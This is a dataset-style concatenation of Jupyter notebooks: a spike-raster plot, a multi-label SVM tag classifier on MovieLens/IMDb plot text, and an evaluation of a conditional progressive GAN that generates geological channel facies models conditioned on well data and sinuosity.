"## iteratively selecting spikes from distinct cluster and generating an array of N arrays for N cells\nfor thatspike in np.arange(len(clean_Clusters_InTheRightArea)):\n #print(clean_Clusters_InTheRightArea[thatspike])\n #length(clean_Clusters_InTheRightArea[thatspike])\n those_spike_indices = (spikeclusters == clean_Clusters_InTheRightArea[thatspike])\n #print(spiketimes[those_spike_indices])\n plt.eventplot(spiketimes[those_spike_indices], lineoffsets=thatspike+1)\n \n #SpikeArray[thatspike,] = np.array(spiketimes[those_spike_indices])\n \n \nplt.ylabel('selected cells')\nplt.xlabel('time (sec)')\nplt.title('rasters of selected cells')\n",
"_____no_output_____"
]
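,
[
"# Hedged sketch (added): collect each selected cluster's spike train into a plain Python list, which is\n# what the commented-out SpikeArray line above appears to aim at. Names are illustrative.\nspike_trains = []\nfor c in clean_Clusters_InTheRightArea:\n    idx = (spikeclusters == c).flatten()\n    spike_trains.append(spiketimes.flatten()[idx])\nprint('collected', len(spike_trains), 'spike trains')",
"_____no_output_____"
]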
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb03f1b4e125820b9257f00f2bcfdec4d1a6ea99 | 2,854 | ipynb | Jupyter Notebook | .ipynb_checkpoints/w_1-checkpoint.ipynb | lucaspecina/lucaspecina.github.io | e9b9a02e1e0c4557e7e1585155006a73c2241b4c | [
"MIT"
] | null | null | null | .ipynb_checkpoints/w_1-checkpoint.ipynb | lucaspecina/lucaspecina.github.io | e9b9a02e1e0c4557e7e1585155006a73c2241b4c | [
"MIT"
] | null | null | null | .ipynb_checkpoints/w_1-checkpoint.ipynb | lucaspecina/lucaspecina.github.io | e9b9a02e1e0c4557e7e1585155006a73c2241b4c | [
"MIT"
] | null | null | null | 21.298507 | 120 | 0.544499 | [
[
[
"from ipywidgets import interact\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport seaborn as sns",
"/Users/lucaspecina/anaconda3/lib/python3.7/site-packages/statsmodels/tools/_testing.py:19: FutureWarning:\n\npandas.util.testing is deprecated. Use the functions in the public API at pandas.testing instead.\n\n"
],
[
"def square(x):\n return x * x",
"_____no_output_____"
],
[
"interact(square, x=10);",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb03fb376d43d144ba17c723a9c84a9459497457 | 8,383 | ipynb | Jupyter Notebook | social-tags/notebooks/movielens-imdb/ovr-svm.ipynb | queirozfcom/auto-tagger | d9c0339648562ceca2d7cd10a02aaf56d353ae7b | [
"MIT"
] | null | null | null | social-tags/notebooks/movielens-imdb/ovr-svm.ipynb | queirozfcom/auto-tagger | d9c0339648562ceca2d7cd10a02aaf56d353ae7b | [
"MIT"
] | 1 | 2016-02-19T03:08:47.000Z | 2016-02-19T03:08:47.000Z | social-tags/notebooks/movielens-imdb/ovr-svm.ipynb | queirozfcom/auto-tagger | d9c0339648562ceca2d7cd10a02aaf56d353ae7b | [
"MIT"
] | null | null | null | 25.793846 | 132 | 0.559227 | [
[
[
"## ovr-svm",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport gc\nimport nltk\nimport os\nimport re\nimport pickle\nimport sklearn\nimport sys\nimport string\n\nfrom sklearn.metrics import f1_score, precision_score, recall_score,average_precision_score\nfrom sklearn.model_selection import cross_val_score, GridSearchCV,ParameterGrid, train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import MultiLabelBinarizer, StandardScaler,MinMaxScaler\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer,TfidfVectorizer\nfrom sklearn.svm import SVC\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\n\nfrom tqdm import *\n\n%matplotlib inline\n%load_ext autoreload\n%autoreload 1",
"_____no_output_____"
],
[
"src_dir = os.path.join(os.getcwd(), os.pardir, '../src')\nsys.path.append(src_dir)",
"_____no_output_____"
],
[
"%aimport data.movielens_20m_imdb\n%aimport helpers.labels,helpers.neighbours, helpers.segments\n%aimport utils.dataframes, utils.clusters",
"_____no_output_____"
],
[
"from data.movielens_20m_imdb import load_df_or_get_from_cache\nfrom helpers.labels import truncate_labels,filter_tag\nfrom helpers.neighbours import get_predicted_labels_from_neighbours\nfrom helpers.segments import make_distance_matrix_for_segments,vectorize_segments\n\nfrom utils.dataframes import sample_rows",
"_____no_output_____"
],
[
"filter_tag(\"the king of the mor_ons-- das\")",
"_____no_output_____"
],
[
"INTERIM_DATA_ROOT = os.path.abspath(\"../../data/interim/movielens-ml20m-imdb/\")\nML_ROOT = \"/media/felipe/SAMSUNG/movielens/ml-20m/\"\nIMDB_ROOT = \"/media/felipe/SAMSUNG/imdb/\"\n\nPATH_TO_MOVIES = ML_ROOT + \"/movies.csv\"\nPATH_TO_TAG_ASSIGNMENTS = ML_ROOT + \"/tags.csv\"\nPATH_TO_MOVIE_PLOTS = IMDB_ROOT+\"/plot.list\"\n\n# CONFIGS\n\nMAX_NB_WORDS = 20000\nMIN_LABEL_DF = int(20)\n\n# for sampling\nNB_DOCS = 1500",
"_____no_output_____"
],
[
"docs_df = load_or_get_from_cache(PATH_TO_MOVIES,PATH_TO_TAG_ASSIGNMENTS,PATH_TO_MOVIE_PLOTS,INTERIM_DATA_ROOT)",
"_____no_output_____"
],
[
"# remove this for production\ndocs_df = sample_rows(docs_df,NB_DOCS)",
"_____no_output_____"
],
[
"docs_df.head()",
"_____no_output_____"
],
[
"docs_df.describe()",
"_____no_output_____"
],
[
"truncated_labels = truncate_labels(docs_df[\"unique_tags\"].map(lambda tagstring: tagstring.split(\",\")).values,MIN_LABEL_DF)",
"_____no_output_____"
],
[
"truncated_labels",
"_____no_output_____"
],
[
"mlb = MultiLabelBinarizer()\nbinary_labels = mlb.fit_transform(truncated_labels)\nprint(\"total number of unique tags: {} \".format(len(mlb.classes_)))\n\ndata = docs_df['plot'].values\nindices = np.arange(len(data))\nnp.random.shuffle(indices)\n\ndata = [data[i] for i in indices]\ntargets = binary_labels[indices]\nnum_validation_samples = int(0.15 * len(data))\n\nX_train = data[:-num_validation_samples]\nY_train = targets[:-num_validation_samples]\nX_val = data[-num_validation_samples:]\nY_val = targets[-num_validation_samples:]\n\nprint('total number of train documents: {}'.format(len(X_train)))\nprint('total number of validation documents: {}'.format(len(X_val)))",
"_____no_output_____"
],
[
"# good order (OVR just for the SVM, of course!)\npipeline = Pipeline([\n ('vect', CountVectorizer(max_features=MAX_NB_WORDS)),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(),n_jobs=-1)),\n])\n\nparameters = [\n { \n \"clf__estimator__penalty\": [\"l2\"],\n \"clf__estimator__dual\":[False,True],\n \"clf__estimator__multi_class\":[\"crammer_singer\",\"ovr\"],\n \"clf__estimator__tol\": [0.001,0.0001],\n \"vect__max_features\": [MAX_NB_WORDS] \n },\n { \n \"clf__estimator__penalty\": [\"l1\"],\n \"clf__estimator__dual\":[False],\n \"clf__estimator__multi_class\":[\"crammer_singer\",\"ovr\"],\n \"clf__estimator__tol\": [0.001,0.0001],\n \"vect__max_features\": [MAX_NB_WORDS] \n } \n]",
"_____no_output_____"
],
[
"best_score = float(\"-inf\")\n\nfor g in ParameterGrid(parameters):\n pipeline.set_params(**g)\n \n pipeline.fit(X_train,Y_train)\n \n Y_pred_train = pipeline.predict(X_train) \n Y_pred_val = pipeline.predict(X_val)\n \n train_score = f1_score(Y_train,Y_pred_train,average='micro')\n val_score = f1_score(Y_val,Y_pred_val,average='micro')\n \n current_score = val_score\n \n print(\"train micro-F1: {}\".format(train_score))\n print(\"val micro-F1: {}\".format(val_score))\n print(\"grid: {}\".format(g))\n print(\"\")\n \n if current_score > best_score:\n best_score = current_score\n best_grid = g",
"_____no_output_____"
],
[
"print(best_score,best_grid)",
"_____no_output_____"
]
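,
[
"# Hedged follow-up (added): refit the pipeline with the best configuration found by the manual grid search\n# above (mirroring GridSearchCV's refit=True) and re-check the validation score.\npipeline.set_params(**best_grid)\npipeline.fit(X_train, Y_train)\nprint('refit val micro-F1:', f1_score(Y_val, pipeline.predict(X_val), average='micro'))",
"_____no_output_____"
]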
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0406bf15bbf5a527e1e0de53daf98f237953a7 | 616,682 | ipynb | Jupyter Notebook | Code/1_conditioning_to_well_facies_alone_or_with_global_features/Analyses_of_Trained_Generator-Sinuosity-WellEnlarg.ipynb | SCRFpublic/GeoModeling_Conditional_ProGAN | fb8df86f555fa19572ba7fd9ae719ede5cd961ff | [
"MIT"
] | 8 | 2020-06-30T02:39:17.000Z | 2022-03-17T07:14:11.000Z | Code/1_conditioning_to_well_facies_alone_or_with_global_features/Analyses_of_Trained_Generator-Sinuosity-WellEnlarg.ipynb | SuihongSong/GeoModeling_Conditional_ProGAN | 1ad99865743e161811d46ac96972885432d575e6 | [
"MIT"
] | null | null | null | Code/1_conditioning_to_well_facies_alone_or_with_global_features/Analyses_of_Trained_Generator-Sinuosity-WellEnlarg.ipynb | SuihongSong/GeoModeling_Conditional_ProGAN | 1ad99865743e161811d46ac96972885432d575e6 | [
"MIT"
] | 6 | 2020-08-29T01:04:41.000Z | 2022-01-04T06:04:30.000Z | 559.095195 | 302,224 | 0.933395 | [
[
[
"import sys\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nimport PIL.Image\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"##### Set the path to directory containing code of this case",
"_____no_output_____"
]
],
[
[
"new_path = r'/home/users/suihong/3-Cond_wellfacies-upload/'\nsys.path.append(new_path)",
"_____no_output_____"
]
],
[
[
"#### Set the path to data directory; this directory includes two datasets: \"trainingdata\" and \"testdata\"",
"_____no_output_____"
]
],
[
[
"data_dir_test = '/scratch/users/suihong/DataSets(MultiChannels_Version4_Consistency)/'",
"_____no_output_____"
]
],
[
[
"#### Set path to trained network",
"_____no_output_____"
]
],
[
[
"# 19200 means totally 19200 thousand training images (facies models) used for the training\nnetwork_dir = '/scratch/users/suihong/ProGAN_MultiChannel_Reusults_ConditionedtoMultiConditions_TF/099-pgan-cond-Well-sinuosity-2gpu/'\nnetwork_name = 'network-snapshot-025920.pkl'",
"_____no_output_____"
]
],
[
[
"### 1. Fetch dataset",
"_____no_output_____"
]
],
[
[
"# Initialize TensorFlow session.\ntf.InteractiveSession()\n\nimport dataset\n# tfrecord_dir='TestData' to fetch test dataset, if tfrecord_dir='TrainingData' to fetch training dataset\n# labeltypes: 0 for 'channelorientation', 1 for 'mudproportion', 2 for 'channelwidth', 3 for 'channelsinuosity'\n# well_enlarge: if True, well points occupy 4x4 area, otherwise occupy 1x1 area\ntest_set = dataset.load_dataset(data_dir=data_dir_test, verbose=True, tfrecord_dir='TestData', labeltypes = [1,2,3], well_enlarge = True, shuffle_mb = 0, prefetch_mb = 0)\n\n# labels are from -1 to 1\nimage_test, label_test = test_set.get_minibatch_imageandlabel_np(3000) \nprobimg_test, wellfacies_test = test_set.get_minibatch_probandwell_np(3000*8)\n",
"Streaming data using dataset.TFRecordDataset...\nDataset shape = [1, 64, 64]\nDynamic range = [0, 255]\nLabel size = 4\n"
],
[
"print(image_test.shape)\nprint(label_test.shape)\nprint(probimg_test.shape)\nprint(wellfacies_test.shape)",
"(3000, 1, 64, 64)\n(3000, 4)\n(24000, 1, 64, 64)\n(24000, 1, 64, 64)\n"
],
[
"plt.imshow(wellfacies_test[55,0])",
"_____no_output_____"
],
[
"plt.imshow(image_test[60,0])\nplt.colorbar()",
"_____no_output_____"
]
],
[
[
"#### Global features are kept and inputted into Networks with the scale of -1 to 1. To recover the global features into its original scales, use the below transformation functions.\n",
"_____no_output_____"
]
],
[
[
"# index in label_test[:,0], e.g., \"0\" here, needs to be adjusted according to the setting of \"labeltypes = [3]\" in previous \"dataset.load_dataset(..)\" function\n\n#orit_test = (label_test[:,0]/2+0.5)*168-84\nback_ratio_test = (label_test[:,0]/2+0.5)*0.8037109375+0.167724609375\nwidth_test = (label_test[:,1]/2+0.5)*0.8+2.7\namwv_ratio_test = (label_test[:,2]/2+0.5)*0.4866197183098592+0.06338028169014084",
"_____no_output_____"
]
],
[
[
"### 2. Import pre-trained Network",
"_____no_output_____"
]
],
[
[
"# Initialize TensorFlow session.\ntf.InteractiveSession()\n\n# Import networks.\nwith open(network_dir+network_name, 'rb') as file:\n G, D, Gs = pickle.load(file)",
"/share/software/user/open/py-tensorflow/1.12.0_py36/lib/python3.6/site-packages/tensorflow/python/client/session.py:1702: UserWarning: An interactive session is already active. This can cause out-of-memory errors in some cases. You must explicitly call `InteractiveSession.close()` to release resources held by the other session(s).\n warnings.warn('An interactive session is already active. This can '\n"
]
],
[
[
"\n### 3. Evaluation of the imported pretrained Generator\n",
"_____no_output_____"
],
[
"### 3.1 Fetch 300 inputs from Test dataset",
"_____no_output_____"
]
],
[
[
"# Sample 300 global features, probability maps, and well facies data\nfaciesmodels_real = image_test[:3000]\nlabels_inspect = label_test[:3000]\nproborder = np.arange(3000) * 8 + np.random.RandomState(32).randint(0, 8, size=3000)\n\nwellfacies_inspect_init = wellfacies_test[proborder]\nwellfacies_points_inspect = np.where(wellfacies_inspect_init>0, 1, 0)\nwellfacies_facies_inspect = np.where(wellfacies_inspect_init<1.5, 0, 1)\nwellfacies_inspect = np.concatenate([wellfacies_points_inspect, wellfacies_facies_inspect], 1)",
"_____no_output_____"
],
[
"print(labels_inspect.shape)\nprint(wellfacies_inspect.shape)",
"(3000, 4)\n(3000, 2, 64, 64)\n"
]
],
[
[
"##### Create masks to only output visualize well facies against white background",
"_____no_output_____"
]
],
[
[
"### Enlarge areas of well points for displaying ###\nwellfacies_onechannel = wellfacies_inspect[:,0:1]+wellfacies_inspect[:,1:2]\nwellfacies_onechannel_mask = np.ma.masked_where(wellfacies_onechannel == 0, wellfacies_onechannel)\ncmap_well = plt.cm.viridis # Can be any colormap that you want after the cm '.\ncmap_well.set_bad(color='white')",
"_____no_output_____"
]
],
[
[
"### 3.2 General visual assessment",
"_____no_output_____"
],
[
"#### Visual assessment on realism, diversity, conditioning to global features, conditioning to well facies data",
"_____no_output_____"
],
[
"* (1) Input corresponding global features with well data into trained Generator\n\n Second column corresponds to ground truth for well facies data and global features.",
"_____no_output_____"
]
],
[
[
"print(Gs.input_shapes)",
"[[None, 128], [None, 1], [None, 2, 64, 64]]\n"
],
[
"fig, ax = plt.subplots(8, 16, sharex='col', sharey='row')\nfig.set_size_inches(25, 12.5, forward=True)\n\nimages_plt_average = np.zeros((8,1,64,64))\nfor i in range (8):\n \n ax[i, 0].imshow(wellfacies_onechannel_mask[i,0], cmap=cmap_well, vmax = 2.15)\n ax[i, 1].imshow(faciesmodels_real[i,0,:,:]) # *15+50 is to create inconsistency between labels and probimg\n \n latents_plt = np.random.randn(500, Gs.input_shapes[0][1])\n labels_plt = np.repeat(np.expand_dims(labels_inspect[i,2:3], axis=0), 500, axis=0) ## \n wellfacies_plt = np.repeat(np.expand_dims(wellfacies_inspect[i], axis=0), 500, axis=0)\n \n images_plt = Gs.run(latents_plt, labels_plt, wellfacies_plt)\n images_plt = np.where(images_plt< -0.3, -1, images_plt)\n images_plt = np.where(images_plt> 0.3, 1, images_plt)\n images_plt = np.where((images_plt> -0.4) & (images_plt< 0.4), 0, images_plt)\n\n images_plt_a = (np.where(images_plt> -0.2, 1, images_plt) + 1)/2\n images_plt_average[i] = np.average(images_plt_a, axis = 0)\n\n for j in range(2,15):\n ax[i, j].imshow(images_plt[j-2,0,:,:])\n ax[i, 15].imshow(images_plt_average[i, 0]) \n#plt.savefig(network_dir + \"Random Latents.png\", dpi=200) ",
"_____no_output_____"
]
],
[
[
"### 3.3 Evaluation of Generator's conditioning ability to global features",
"_____no_output_____"
],
[
"#### 3.3.1 Visual assessment by comparing to corresponding ground truth facies models.",
"_____no_output_____"
],
[
"* Generate facies models with increasing input sinuosity index \n",
"_____no_output_____"
],
[
"** Choose appropriate increasing global features from test data. **\n These chosen global features will be used to simulate facies models; these facies models will be compared to ground truth facies models with the same global features in test dataset\n ",
"_____no_output_____"
]
],
[
[
"amwv_ratio_no = 4",
"_____no_output_____"
],
[
"amwv_ratio_test_max = np.max(amwv_ratio_test)\namwv_ratio_test_min = np.min(amwv_ratio_test)\nplot_img_no = np.empty((amwv_ratio_no), dtype = np.int)\nfor j in range(amwv_ratio_no):\n for r in range(amwv_ratio_test.shape[0]):\n if amwv_ratio_test[r] >= (amwv_ratio_test_max - amwv_ratio_test_min) * j/amwv_ratio_no+amwv_ratio_test_min and \\\n amwv_ratio_test[r] < (amwv_ratio_test_max - amwv_ratio_test_min) * (j+1)/amwv_ratio_no+amwv_ratio_test_min and \\\n back_ratio_test[r] >= 0.5 and back_ratio_test[r] <0.6:\n plot_img_no[j] = r\n break",
"_____no_output_____"
],
[
"print(plot_img_no)",
"[ 6 2 18 0]\n"
]
],
[
[
"##### Simulate with the above chosen appropriate global features",
"_____no_output_____"
]
],
[
[
"# This cell is only used for evaluation of conditioning to sinuosity when the GAN is only conditioning to sinuosity and well facies data\nfig, ax = plt.subplots(4, 16, sharex='col', sharey='row')\nfig.set_size_inches(24, 6, forward=True)\n\nimages_plt_average = np.zeros((4,1,64,64))\nimages_plt_variance = np.zeros((4,1,64,64))\nfor i in range (4):\n gt_no = plot_img_no[i]\n ax[i, 0].imshow(faciesmodels_real[gt_no,0,:,:]) \n ax[i, 1].imshow(wellfacies_onechannel_mask[gt_no,0], cmap=cmap_well, vmax = 2.15)\n \n latents_plt = np.random.randn(500, Gs.input_shapes[0][1])\n labels_plt = np.repeat(np.expand_dims(labels_inspect[gt_no,3:4], axis=0), 500, axis=0) ## \n wellfacies_plt = np.repeat(np.expand_dims(wellfacies_inspect[gt_no], axis=0), 1 * 500, axis=0)\n \n images_plt = Gs.run(latents_plt, labels_plt, wellfacies_plt)\n images_plt = np.where(images_plt< -0.3, -1, images_plt)\n images_plt = np.where(images_plt> 0.3, 1, images_plt)\n images_plt = np.where((images_plt> -0.4) & (images_plt< 0.4), 0, images_plt)\n\n images_plt_a = np.where(images_plt> -0.3, 1, 0)\n \n images_plt_average[i] = np.average(images_plt_a, axis = 0)\n images_plt_variance[i] = np.var(images_plt_a, axis = 0)\n\n for j in range(2,14):\n ax[i, j].imshow(images_plt[j-2,0,:,:])\n ax[i, 14].imshow(images_plt_average[i, 0], vmin = 0, vmax = 1) \n ax[i, 15].imshow(images_plt_variance[i, 0], vmin = 0, vmax = 0.25)\nplt.savefig(network_dir + \"Condition to sinuosity1.png\", dpi=200) ",
"_____no_output_____"
],
[
"print(plot_img_no)\nprint(amwv_ratio_test[plot_img_no])",
"[ 6 2 18 0]\n[0.07 0.22999999 0.38016528 0.55 ]\n"
]
],
[
[
"#### 3.3.2 Quantitative assessment by comparing to corresponding ground truth facies models.\n#### * Assess channel sinuosity\n#### Second quantitative evaluation method in paper.\n##### 1) With input global features from test dataset, generate a number of facies model realizations;\n##### 2) Use image process toolbox in Matlab to measure the channel sand sinuosity for each generated facies model and the real facies model in test dataset;\n##### 3) Use blox plot to compare the distribution of calculated global features from the generated facies models and the real facies models from test dataset.\n",
"_____no_output_____"
]
],
[
[
"latents_plt = np.random.RandomState(99).randn(300, Gs.input_shapes[0][1])\nlabels_plt = label_test[:300, 3:4]\nwellfacies_plt = wellfacies_inspect[:300]\n\n# Run the generator to produce a set of images.\nimages_plt = Gs.run(latents_plt, labels_plt,wellfacies_plt)\nimages_plt = np.where(images_plt< -0.3, -1, images_plt)\nimages_plt = np.where(images_plt> 0.3, 1, images_plt)\nimages_plt = np.where((images_plt> -0.4) & (images_plt< 0.4), 0, images_plt)",
"_____no_output_____"
],
[
"# Save the generated facies models to measure their global features in Matlab\n\nnp.savetxt(network_dir + 'images_generated.out', np.reshape(images_plt,[-1,64]), delimiter='\\n', fmt='%1.1e') # X is an array\nnp.savetxt(network_dir + 'input_sinuosity.out', amwv_ratio_test[:300], delimiter=',', fmt='%1.4e')",
"_____no_output_____"
],
[
"# Calculate corresponding mud facies proportion, used for falsification\nprops = np.average(np.where(images_plt < -0.5, 1, 0), axis = (1, 2, 3))\nnp.savetxt(network_dir + 'images_generated_variouswelldata.out', props, delimiter='\\n', fmt='%1.4e') \n",
"_____no_output_____"
]
],
[
[
"###### Box plot",
"_____no_output_____"
]
],
[
[
"# statistics of generated facies models with differnt input sinuosity\natodlen1=[1.11889313640155,1.09077787644318,1.12165645035333,1.09007474127227,1.13424798563159,1.13978293428402,1.11589740130591,1.08779763348608,1.10422031446294,1.17915902056786,1.02510382912376,1.17754080734206,1.10875489964738,1.18006034468054,1.27723890880682,1.14638300311517,1.08693130776357,1.1252197699912,1.109755804729,1.16673251350461,1.06846449139615,1.17203190188304,1.16330998283785,1.0672391301468,1.08866531192593,1.12416211546016,1.08876828138484,1.13792798971085,1.08172883034534,1.21580531837135,1.16354479912917,1.08044443747823,1.10654455347437,1.10174692816356,1.15188569360076,1.1405607079217,1.18031308206105,1.18542732746059,1.1232360416386,1.08106615903648,1.03094429058473,1.09190293169268,1.11142403382545,1.16616135904274,1.10355341434478,1.16389655030855,1.16659102541762,1.13192857588692,1.07118203692042,1.1266728660161,1.07459689798195,1.09970672681694,1.10635609001926,1.13221228463309,1.11750625345516,1.14314916661737,1.20083274841309,1.20504213919236,1.18240699508685,1.08712839696534,1.2260388931612,1.12483686658524,1.13391254500886,1.11078855865792,1.1359207331302,1.22642969615047]\natodlen2=[1.23346416627969,1.18790795871182,1.13206343645113,1.15338398825942,1.35522185771154,1.25681517599675,1.25224679547042,1.29612092872378,1.24560397238837,1.1491338876045,1.25456488401029,1.23013928805078,1.19372906892008,1.22265130803079,1.21318294337388,1.28551517544856,1.25217338162324,1.10815673856744,1.14175645721712,1.20245720113621,1.26116454098179,1.23981030791812,1.10862054524809,1.19454408468376,1.26833117593655,1.17526158283443,1.3340651202328,1.20681028667095,1.28884541800114,1.29659761124924,1.17471201367372,1.2623522326848,1.27644874404882,1.27708851822535,1.20310242653192,1.20839972375883,1.2577319236707,1.19332561298605,1.19804239122632,1.27270631353138,1.15814653319549,1.17790658980959,1.28400380876366,1.274688236357,1.40724325130618,1.18431519006312,1.38478713245515,1.33262839242974,1.22182427675395,1.28858043330918,1.2480230728123,1.26572099474012]\natodlen3=[1.42192410908225,1.30050392626452,1.39992573412069,1.37263802405987,1.47959767824524,1.33871582748462,1.55702586171734,1.29703136026025,1.42648817860534,1.54277708166896,1.3413078386406,1.37451623939317,1.33874745766729,1.28142160021022,1.3640579438568,1.3312281783283,1.26124791761409,1.42836951848415,1.42330129463223,1.3824873212986,1.32318867234402,1.34780962028487,1.46170292845754,1.40062567956459,1.34601323608999,1.2991542394207,1.39879432768685,1.35982398566578,1.38103394691446,1.46038873239369,1.3695438754174,1.32504218975231,1.38660499687224,1.52656655308705,1.46086932069164,1.39252518413149,1.32385365329999,1.49312453883924,1.48530704668984,1.38268800710165,1.50227513995371,1.40363340757143,1.43564719222004,1.30066577684531,1.38946521505559,1.35515484785891,1.35373208958743,1.48410146998181,1.55720364978457]\natodlen4=[1.47854052910486,1.44875296985827,1.56205549619363,1.49967116076352,1.5110593576732,1.54660190884447,1.61775808590815,1.63299484355889,1.44380133543288,1.8768958182758,1.51801322831438,1.66702979671336,1.58709698671153,1.51647210762613,1.43256584267425,1.63567708346971,1.67397299546274,1.7805802368729,1.49779277041385,1.7116209119977,1.69743132669584,1.54304168767851,1.50029133424245,1.43418602408524,1.64933702557829,1.68593331031236,1.46346597383482,1.59628920777078,1.4938495366634,1.5193055744107,1.77318391930879,1.51501375015756,1.66865709073917,1.57122626158941,1.38764347641693,1.52438039615829,1.696781349627
63,1.47333633645482,1.60123019487691,1.46272626757244,1.63630072740957,2.09612413473267,1.82043738987135,1.76016424252416,1.70838436718918,1.61712018873247,1.52252092436247,1.60551035800042,1.70797328069314,1.61350523799317,1.51520291640211,1.51784056099423,1.50671388504789,1.58125653505074,1.46183724432156,1.75201099012403,1.50460566587645,1.32495784759522,1.63960059500893,1.83595874370741,1.62801633133348,1.31987552398628,1.91973429586026,1.53907450403085,1.33521982648562,1.52347521729374,10.3066484298083,1.4467062138431,1.38666242910265,1.60423843720179,1.53993290339551,1.74443934718012,1.45756769539599,1.55009632415411,1.3521773223474,1.43932014186439,1.46019141523122,1.58652908035827,1.66918275044889,1.6224014047749,1.39148723365835,1.52729178631895,1.89642724630959,1.56554835652658,1.82062181678182,1.4529929845647,1.77689702994759,1.59889335828939,1.61332230786664,2.05694321876533,1.44468123769683,1.49215293366155,1.44791406892582,1.64402865035875,1.54780224110627,1.63894827288451,5.22306304558851,1.53235259488324,1.37752366585505,1.51948863864103,1.70012307970306,1.62365146804077,1.5619331999111,1.64510583463559,1.5848142375346,1.49508528589155,1.42645082603477,1.460990268011,2.01645794711342,1.40852830991425,1.57794744143376,1.25163213782414,1.55399420643523,1.44450010301215,1.47066214824339,1.7198627187404,1.48373251955428,1.57968195253227,1.59452089774149,1.68339687365707,1.51820707428025,1.46864477882538,1.62361567367562]\n",
"_____no_output_____"
],
[
"fig1, ax1 = plt.subplots()\nax1.set_title('Sinuosity assessment of generated facies models')\nax1.boxplot([atodlen1,atodlen2,atodlen3,atodlen4],showfliers=False)\nplt.savefig(network_dir + \"Sinuosity assessment of generated facies models.png\", dpi=200) ",
"_____no_output_____"
]
],
[
[
"### 3.4 Evaluation of Generator's conditioning ability to input well data",
"_____no_output_____"
],
[
"**Well points accuracy evaluation**",
"_____no_output_____"
]
],
[
[
"def get_random_well_facies_data(images_num):\n well_points = np.zeros([images_num, 1, 64, 64], dtype = int)\n for i in range(images_num):\n well_points_num = np.random.RandomState(3*i).choice(np.arange(8, 16), 1) # Random choose the expected total number of well points\n xs = np.random.choice(64, well_points_num)\n ys = np.random.choice(64, well_points_num)\n well_points[i, 0, xs, ys] = 1\n\n # Using test facies models to sample faices types at well points\n well_facies = np.where(well_points * image_test[:images_num]>0, 1, 0)\n well_facies = np.concatenate([well_points, well_facies], 1) \n \n return well_facies",
"_____no_output_____"
],
[
"def generate_images(realization_num, well_facies):\n # Generate latent vectors.\n latents_plt = np.random.randn(realization_num, Gs.input_shapes[0][1]) \n labels_plt = np.random.uniform(-1, 1, (realization_num, Gs.input_shapes[1][1])) \n well_facies_plt = well_facies\n\n # Run the generator to produce a set of images.\n images_plt = Gs.run(latents_plt, labels_plt, well_facies_plt)\n images_plt = np.where(images_plt< -0.3, -1, images_plt)\n images_plt = np.where(images_plt> 0.15, 1, images_plt)\n images_plt = np.where((images_plt>= -0.3) & (images_plt<= 0.15), 0, images_plt)\n return images_plt",
"_____no_output_____"
],
[
"def well_points_accuracy(well_facies, fake_imgs_a):\n gg = well_facies_smp_train_facies[:,0:1] + well_facies_smp_train_facies[:,1:2]\n \n recognized_f1 = np.where((gg==2) & (well_facies_smp_train_facies[:,0:1] * (fake_imgs_a+1) > 0.8), 1, 0)\n f1_prob = np.sum(recognized_f1)/np.sum(np.where(gg==2,1,0))\n\n recognized_f0 = np.where((gg==1) & (well_facies_smp_train_facies[:,0:1] * (fake_imgs_a+2) ==1), 1, 0)\n f0_prob = np.sum(recognized_f0)/np.sum(np.where(gg==1,1,0))\n \n return f1_prob, f0_prob",
"_____no_output_____"
],
[
"def enlarge(well_facies):\n ### Enlarge areas of well points into 4 x 4 as inputs\n with tf.device('/gpu:1'):\n well_facies = tf.cast(well_facies, tf.float32)\n well_facies_enlarge = tf.nn.max_pool(well_facies, ksize = [1,1,4,4], strides=[1,1,1,1], padding='SAME', data_format='NCHW') \n with tf.Session() as sess: \n sess.run(tf.global_variables_initializer())\n well_points_el = sess.run(well_facies_enlarge) \n return well_points_el",
"_____no_output_____"
],
[
"images_num = 1000\nwell_facies_smp_train_facies = get_random_well_facies_data(images_num)\nwell_facies_smp_train_facies_el = enlarge(well_facies_smp_train_facies) \nfake_imgs = generate_images(images_num, well_facies_smp_train_facies_el)\nf_c_prob, f_m_prob = well_points_accuracy(well_facies_smp_train_facies, fake_imgs)\nprint(f_c_prob) # well facies reproduction accuracy for input channel complex facies\nprint(f_m_prob) # well facies reproduction accuracy for input mud facies",
"0.9952981406283394\n0.9785766691122524\n"
]
],
[
[
"### 4. Evaluation of the imported pretrained Discriminator as a global feature recognizer",
"_____no_output_____"
],
[
"#### Assess D with Test data",
"_____no_output_____"
]
],
[
[
"plt_data_no = 500\na = np.arange(plt_data_no)\nnp.random.shuffle(a)\ntest_img_no = a[:plt_data_no]\n_, features = D.run(image_test[test_img_no]/127.5-1)",
"_____no_output_____"
],
[
